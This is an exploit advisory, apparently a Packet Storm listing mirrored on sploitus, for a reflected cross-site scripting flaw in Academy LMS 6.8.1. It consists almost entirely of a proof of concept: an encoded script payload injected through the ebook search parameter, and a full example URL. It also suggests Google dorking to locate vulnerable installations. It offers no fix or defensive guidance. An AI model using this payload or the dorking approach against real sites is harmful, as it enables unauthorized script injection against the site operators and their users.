Academy LMS 6.8.1 Cross Site Scripting exploit

Share

## https://sploitus.com/exploit?id=PACKETSTORM:179834 ============================================================================================================================================= | # Title : Academy LMS 6.8.1 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://demo.creativeitem.com/academy/ | ============================================================================================================================================= poc : [+] Dorking Ä°n Google Or Other Search Enggine. [+] use payload : /ebook?search=the%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(965964)%3C/ScRiPt%3E [+] https://127.0.0.1/demo.creativeitem.com/academy/ebook?search=the%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(965964)%3C/ScRiPt%3E Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================